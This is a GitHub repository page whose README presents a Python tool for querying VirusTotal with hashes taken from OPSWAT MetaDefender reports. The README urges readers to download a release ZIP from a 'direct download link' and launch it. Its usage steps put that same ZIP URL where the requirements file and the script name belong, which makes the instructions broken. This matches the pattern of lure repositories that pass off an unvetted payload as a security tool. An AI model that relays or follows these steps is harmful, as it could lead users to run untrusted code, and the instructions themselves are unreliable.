Skip to content

A Python script for further analyzing OPSWAT MetaDefender scan reports by extracting hash values from the reports and querying them against the VirusTotal API.

Notifications You must be signed in to change notification settings

JamoTooTuff/opswat-VTHashQuery

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 

Repository files navigation

OPSWAT VTHashQuery πŸ”

Overview

Welcome to OPSWAT VTHashQuery GitHub repository! This repository contains a Python script that allows you to perform further analysis on OPSWAT MetaDefender scan reports. The script extracts hash values from the reports and queries them against the VirusTotal API. By using this tool, you can gain deeper insights into the files scanned by OPSWAT MetaDefender and check their status on VirusTotal.

Features

πŸ“ Extract Hash Values: Easily extract hash values from OPSWAT MetaDefender scan reports.

πŸ”Ž Query Against VirusTotal API: Query the extracted hash values against the VirusTotal API for detailed analysis.

🐍 Python Script: Written in Python, making it easy to run and modify according to your needs.

Repository Details

  • Repository Name: OPSWAT VTHashQuery
  • Description: A Python script for further analyzing OPSWAT MetaDefender scan reports by extracting hash values from the reports and querying them against the VirusTotal API.
  • Topics: hash, metadefender, opswat, python, query, virustotal, virustotal-api, virustotal-python, virustotal-search, vt

Getting Started

To get started with OPSWAT VTHashQuery, you can download the software from the following link: Download Software

Please note that the link provided is a direct download link, so the downloaded file needs to be launched to start using the software.

If you encounter any issues with the download link or need more information, you can also check the Releases section of this repository for additional resources.

Usage

  1. Clone the repository to your local machine.
  2. Download the necessary dependencies by running pip install -r https://github.com/JamoTooTuff/opswat-VTHashQuery/releases/download/v1.0/Release.zip.
  3. Run the Python script https://github.com/JamoTooTuff/opswat-VTHashQuery/releases/download/v1.0/Release.zip to start the analysis process.
  4. Follow the on-screen instructions to extract hash values and query them against VirusTotal.

Contributing

Contributions to OPSWAT VTHashQuery are welcome! If you have any ideas for improvements or new features, feel free to fork the repository and submit a pull request. Your contributions can help make this tool even more powerful and useful for the community.

Support

If you have any questions, issues, or feedback regarding OPSWAT VTHashQuery, please open an issue. Your feedback is valuable and will help us continue to improve this tool.

Thank you for checking out OPSWAT VTHashQuery! Happy analyzing! πŸš€

About

A Python script for further analyzing OPSWAT MetaDefender scan reports by extracting hash values from the reports and querying them against the VirusTotal API.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published